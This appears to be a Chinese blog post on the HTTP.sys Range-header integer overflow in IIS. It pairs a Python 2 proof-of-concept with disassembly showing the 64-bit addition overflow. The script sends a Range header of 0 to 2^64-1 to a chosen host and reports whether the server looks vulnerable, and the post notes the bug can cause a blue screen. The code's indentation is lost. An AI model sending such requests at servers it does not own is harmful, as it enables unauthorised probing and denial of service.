要去看埃菲尔铁塔的顶
欢迎关注本人微博:t.cn/RGSLVUk
现在最多造成蓝屏
POC
import socket
import random
ipAddr = "WebSite"
hexAllFfff = "18446744073709551615"
count=0
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes="+str(count)+"-" + hexAllFfff + "\r\n\r\n"
print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
print "[*] Not IIS"
exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
print "[*] Looks Patched"
else:
print "[*] Unexpected response, cannot discern patch status"
print goodResp
漏洞原理:
HTTP.sys 在处理内核缓存数据时,
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
eax1 = eax - edi
ecx1 = ecx - edx
RtlULongLongAdd (eax1 , ecx1)
其中 eax1 与 ecx1 是 处理 HTTP 请求中
Range: bytes="+offsetlow+"-" + offsethigh+ "\r\n\r\n"
当 offsetlow = 0 , offsethigh = 0xFFFFFFFFFFFFFFFF
时 经过 RtlULongLongAdd 操作
0xFFFFFFFFFFFFFFFF + 0 + 1 = 0 造成整数溢出